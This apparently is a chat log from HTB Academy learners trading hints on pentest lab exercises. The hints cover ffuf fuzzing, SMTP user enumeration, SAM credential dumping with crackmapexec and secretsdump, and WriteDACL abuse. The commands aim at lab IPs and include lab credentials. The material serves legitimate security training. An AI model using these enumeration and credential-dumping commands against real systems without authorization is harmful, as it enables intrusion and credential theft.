the pwnbox got internet ?

yes

yeah that wont work :9

it will work LMFAO

i've done it

maybe ur magic

I have done it today too

it should work

ah is this a download from right next to the question?

yes, thats what i meant as the challenge files

yeah any call to https://academy.hackthebox.com/* requires your htb_academy_session cookie

so is there any easy way to download the files, or am i going to stop using pwnbox

a lot of the stuff is stored on like storage.hackethebox.com/

if you open the browser dev tools and go to the application tab (on Chrome) or Storage (on firefox iirc) and click cookies you can find the "htb_academy_session" cookie

can't you use curl with cookies and output the downloaded file?

that's literally all it needs for that

since it's not calling to the storage server for whatever reason

alright

i mean you can also use the network tab to see if it's calling out to that instead

¯_(ツ)_/¯

i am going to use a vm

but thanks for the ideas, i was hoping for a simpler solution

i just wanted to try something out quickly

yeah this is one of those few cases that because it's in the module instead of a resources bucket

sorry to be more specific it's not calling academy.hackthebox.com/storage

which doesn't require any authentication to pull

@jaunty vigil the footprinting one (as an example)

since it's from the resources directories bucket it doesn't actually require authentication

https://academy.hackthebox.com/module/54/section/505

that's ffuf being ffuf

but also somewhat spoilery

make sure you're also filtering for the right size, if you changed the size of the terminal that's running ffuf it'll do that

look for the common size returned if you're getting multiple positives

and use that as your response size to filter against

-fs

the examples don't always match up to what you're testing

Has anyone here used sysreptor for reporting on the exam? If so, did you find an easy way to export the report as plain markdown?

the size that i filter is already correct

did you make the screen bigger after starting the command?

no

try opening a new terminal, maximize it, and run ffuf in that

ffuf is dumb like that sometimes

also your size doesn't look correct if you're getting a bunch of 200s

use the common size returned by all those 200s

SIZE: 7..

or words?

the correct one will return something that is not 7..

i try to run the command again with fullscreen and then i already got the new output

that's not an always valid way to filter with

it always depends

🤔 it managed to help me but I will keep that in mind

again it depends

true

do you know what words will and won't be on the returned outputs

bearing in mind ffuf looks at the html code

not really. but server response is definite for a non existent subdomain

if im correct

this isn't about a subdomain

it's filtering for a parameter value

I understand

so it has nothing to do with a non-existent subdomain

there may be a word to filter by, if the bad parameter value elicits that response

it all depends how it's coded

got it 🤔

they aren't fuzzing for fuzz.htb they are fuzzing for 'param=FUZZ'

so nothing to do with subdomain/vhost

yeah I understand

basically burp param miner

your line of thinking isn't entirely incorrect

just needed to be worded better to be able to expand into broader thinking

such as using qualifying words like "For Example"

For Example, a server responds in a specific way to a non existent subdomain or page

allows a person to broaden that thought to other ways

as opposed to the definite:
a server responds in a specific way to a non existent subdomain
this may lead the reader to not really think outside the box of it's definite meaning you give it

here goes my 10+ hours

Web Fuzzing > Directory and File Fuzzing

Within the "webfuzzing_hidden_path" path on the target system (ie http://IP:PORT/webfuzzing_hidden_path/), fuzz for folders and then files to find the flag.

Tried:
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/w2ksvrus/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/hidden_fuzzing_path/FUZZ

didn't got any result got the same endpoint as mention in module
| URL | http://IP:PORT/w2ksvrus/dblclk.html
* FUZZ: dblclk

[Status: 200, Size: 112, Words: 6, Lines: 2, Duration: 0ms]
| URL | http://IP:PORT/w2ksvrus/index.html
* FUZZ: index

Nothing new.

can someone help here?

Like i have tried so many combinations

brain is actully fked

more context is useful for those helping you. (module name, section name, what you have tried, your current understanding, etc.)

done sir

thanks for guidence.

Did you actually try from the http:ip:port/web_fuzzing_hidden path?

yap its still running

They literally mean start from that exact directory

anything wrong here?

will add files -e flag too later once this finish

I used the same command as the example (for wordlist and other stuff)

https://tenor.com/s6o0.gif

flag right now for me

that's true. Thanks I shall apply that from now on.

In the broken authentication assessment, I found several users, but I only found the password for one of them. For that user and pass, I have tried everything, but I cannot bypass the OTP stage (from brute-force OTP to URI and method manipulation). Is it possible the user for whom I found the password and reached the OTP stage could be incorrect?

In the "Introduction to Threat Hunting & Hunting With Elastic" Skills Assessment, I have been stuck on Hunt 2 for a few hours.

I feel like I have entered every single registry.value into the answer field, based on the KQL queries I made from the hint provided. The corresponding article link provided doesn’t seem to help much either.

Does anyone have any advice or a further clue for Hunt 2?

😉

It seems i'm working with infinity still no results

Hey y'all! I'm in Active Directory Enumeration & Attacks-Initial Enumeration of the Domain.

I SSH'd as instructed, and then ran sudo nmap -A -v -Pn 172.16.x.x. But I'm getting a response say 0 hosts up.

delete the box

Actually, it's saying (host down). Is there anything I can do?

Huh?

check UDP i guess or try -Pn flag with TCP scan

can some one tell what's wrong in these commands

||ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://94.237.59.199:31136/hidden_fuzzing_path/FUZZ.html -e .php,.html,.txt,.bak,.js

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://94.237.59.199:31136/hidden_fuzzing_path/FUZZ||

The first command u have .html already so u would be adding html.php

Hi, when I try to transfer files in the SAM section of password attacks it denies my access to the share

even if the share is being run with sudo on Linux and CMD prompt is run as admin on Windows

how do I get it to approve?

Does it say something about the administrator?

yes

try making a copy of it.

ok

Yeah u have to edit the registry I think.

U can just use powershell and ftp

ok cool

but if copied file work i don't this reg changes are required.

but yes can be a way

can try both

I had that error too and the registry worked

Other ways are a lot quicker tho

but section says nothing about registry

Ik

ok. in that case I'll do this the powershell way

That’s not part of the module

but if its not a part of the module and its not in the section why is it a requirement?

just by accident?

i have tried that too didn't work

By removing html?

to make you mind do some excercies?

yes did no result

Possibly but there’s always multiple ways

ok

@safe star check these

Is that actually the name of the path?

the hidden one ?

Yea

I tried it in PS but it won't work

have got only one so far w2ksvrus

and its showing the same demo flag only

With pyftpdlib and powershell?

and index.html

dblclk > HTB{18...89}

I found it instantly @somber fiber

not working for me for some reason

Are u on the directory or page fuzzing?

got only one dir > w2ksvrus for this don't page one

Hi there, I'm working on this module (it's around gobuster, ffuf, whatweb, etc) directory and dns mapping, I found a wordpress, the version of it and it's still on a (setup state) I believe there is a vulnerability there but I can't find the exploit, anyone aware of it ?

Which section?

first one

I was trying to do the module footprinting section "SMTP", but I can't seem to get my script for trying multiple users to work ||for name in $(cat /opt/useful/seclists/Usernames/Names/names.txt); do telnet 10.129.171.248 25; VRFY $name | grep -v '550' | tee -a usernames.txt;done|| this is what I have

Page or directory fuzzing?

page

Did u try fuzzing the b*** directory?

Like the question asked

yes

there i got only one directory "w2ksvrus "

That’s not it

Dm me the command

use smtp-user-enum script

it should be present in the PwnBox

actually I'm pretty sure this is the vulnerability (wordpress is still in setup), but I don't find the CVE nor the exploit, anyone has a tip as to where I can look for it please ?

Hmmm okok, so this box the idea was too look through the files of the box to find the script?

Or is that an nmap script?

not really tbh. they just wanted us to research on our own

Ohhh I see

no its a standalone binary

Gotta do my research then ahaha

https://www.kali.org/tools/smtp-user-enum/

Ty very much for the help

its worth it

pleasure

hi I got to the end where I need to dump the credentials on the target and its not working even when I copy exact command and change the IP

btw the stuff @safe star and @somber fiber recommended to previous questions didn't work. I figured out the prior two questions. For this third one please don't tell me to do something that doesn't work. So can someone who knows this one section and what I need to do here please help me. The stuff people recommended the other day worked much better

anyway, I'm on the third question again

Is the VAT percentage standard for all countries in the subscriptions ?

if just by asking and getting answers can make the brain go burrrrrr i'm all in

ok I didn't mean to be a jerk

I probably went a little far. Its just some of the stuff you recommended work not even on topic to the section and I tried it and it didn't work.

That said, I think ideally if you have a hint for the third question you can hopefully make up for it

me 2 sorry and learning is a process and its a field where do experiments rather getting on conclusion.

i worked for me no problem with the smbserver

ok well, that's fine

is there a way to abuse writedacl from linux? I dont think powerview is actually making the changes when i use Add-DomainObjectAcl

I guess each case is different

can someone help me with question 3?

did u run the impacket smbserver just like it said?

yes

but I had a couple minor things wrong

but I got the SMB server running

I'm on question 3. the files have been moved

I got first two flags already

Academy's File Inclusion Box is either really hard or my notes are really bad

Anyone who has solved it?

did u use secrets dump

yes

it should be at the bottom

ok

here's the command I use:

┌─[us-academy-1]─[10.10.14.143]─[htb-ac-605555@htb-dvdmy7b9tc]─[~]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

I think there's something off about the command

hold on let me change IP address